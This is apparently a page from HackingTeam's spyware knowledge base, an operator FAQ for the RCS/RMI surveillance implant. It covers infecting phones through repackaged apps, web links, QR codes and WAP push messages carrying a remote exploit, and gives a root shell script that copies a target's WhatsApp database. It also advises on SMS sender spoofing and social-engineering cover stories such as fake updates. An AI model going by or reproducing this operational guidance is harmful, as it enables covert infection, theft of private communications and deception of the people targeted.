]HackingTeam[ KnowledgeBase Product
Search:     Advanced search
What does "Root Status: RUN, Result: GOT ALREADY” means?

What does "Root: yes, Su: no, Admin: no, Persistence: not required[c]" means?

- If required:

- Starting state = required, to be installed:

- if the root is available, try to install the persistency; the results can be:

o failure, installation failed;
o installed but reboot is required, present, not yet rebooted;
o already installed and rebooted, Present.

- If not required:

not required.

In the details of the targets I see TIMEOUT. What does it mean?
  • Timeout indicates that the sync process was not completed.

In the details of the targets I see: UNAVAILABLE. What does it mean?
  • Unavailable simply means that the agent was not able to retrieve the phone number from the SIM.

What can we do if the cp command is not available?
  • The cp command is not always present in the phones. As an alternative you can use the shell redirection, but you cannot do it directly from Command; you need to write a shell script and then download and it run on the target device via File Transfer/Upload and Execute. Here’s an example of the script you can use:

mkdir /sdcard/WhatsApp/
cat /data/data/com.whatsapp/databases/wa.db > /sdcard/WhatsApp/wa.db
chmod 777 /sdcard/WhatsApp/wa.db

!!! ⇒ The commands are run as root, both as command and as Upload and execute. The difference is that the commands cannot be chained in pipes and do not handle the redirection. Each complex operation should be performed in a script.
!!! ⇒ The fact that the file system is run with the user permissions is not a bug, it's a system feature. It will be improved in the future, but it is neither urgent nor has the status of a bug.

If the queues of evidences to be sent from the target to the server are overloaded and create transfer problems:
  • Run the purge operation on the target (this action will obviously reset the transfer of information currently in the queue).

What about if I create a new factory and infect the phone one more time without knowing if the phone was previously infected? Will it work?
  • If the factory is from the same customer (e.g. same server) you cannot install two agent on the same device.

  • You have to be sure that a previous agent is not installed.

Is it possible to hide or mask/spoof a cell phone number (and perhaps its IMEI) in order to send a message to a target in such a way that the SMS appears as it was sent by another number?
  • RMI can not change these parameters. In order to do that you need to use a service such as that offered by Carro or Circle or, alternatively, one of several online services that offer this feature. In any case, success or failure depends also by the telephone operator.

  • A good approach in order to limit the exposure of a RMI installation could be the usage of a Gold Phone Number; a gold number is a special easy-to-remember phone number.
    Each country has a different policy, but almost every telco offers gold numbers, that can appear as "professional numbers" in a social engineering approach. Some of them offer the opportunity to choose your number.

If an Android Phone is infected through melted app, should the real app be kept? In case it is uninstalled, is the agent removed too?
  • If the melted app is removed, the agent is removed too. We are working on this.

  • If the agent is upgraded to the next release, the original melted application is uninstalled and substituted by the upgraded silent agent.

After activating the scanning of the file system (in root mode) we realized that many files were missing.
  • The scanning of the file system via Android agent is run with user permissions even if root permission is operative. You can use the command ls -l /data/data to extract the file system into a folder because the input command is run with root permissions.

Can I specify the address of the Android remote exploit in the URL of the PUSH Message (Service Load)? Is it advisable to do so?
  • There should be no contraindications. However, remind that not all Android devices support the WAP stack (e.g. some HTC and some Motorola devices). Furthermore, the user can disable the push messages, for this reason it is always recommended to perform preventive tests, both using the Service Loading and with the Service Indication.

What is the correct infection procedure and what are the configuration parameters?
  • In the ZIP file generated by the console there are a TXT file containing the Web link and an image that represents the QR code associated with that link.

  • After entering the link in the target phone, start the download and proceed as any silent installer. The collector destroys the link as soon as it downloads it.

  • You can customize some fields that the target sees during the download: when the target opens the link (or the QR code), the download starts (it arrives as a request).

!!! ⇒ The configuration dialog has some input fields filled by default; the choice of the input values depends on the type of social attack that the customer is using. The default settings are intended to simulate the sending of an update. In some cases it may be more sensible to simulate the sending of an offer to optimise the tariff of a particular provider. Even the field name must comply with the chosen cover story.

I infected a Blackberry with BASIC configuration via Web link (but also infecting it with another vector nothing should change) but the phone will not synchronize, why?

  • If you used the BASIC configuration in order to create the backdoor, by default the agent syncs only via Wi-Fi (not via phone's data connection). If the infection was made through a Web link, it is assumed you used a 3G connection. If the above scenario is correct, without a Wi-Fi connection the phone cannot sync. Also you should consider that the Blackberry synchronizes only when the screen is off, but when the phone is in charge (in some configurations) its screen remains on to display the clock and in these conditions the sync cannot be done.

  • If Wi-Fi is not configured, in versions of RCS previous to version 9.6, the BB can sync only via APN. Since RCS 9.6, the BB can use a free channel of RIM enabling the flag "force cell" in the sync configuration parameters.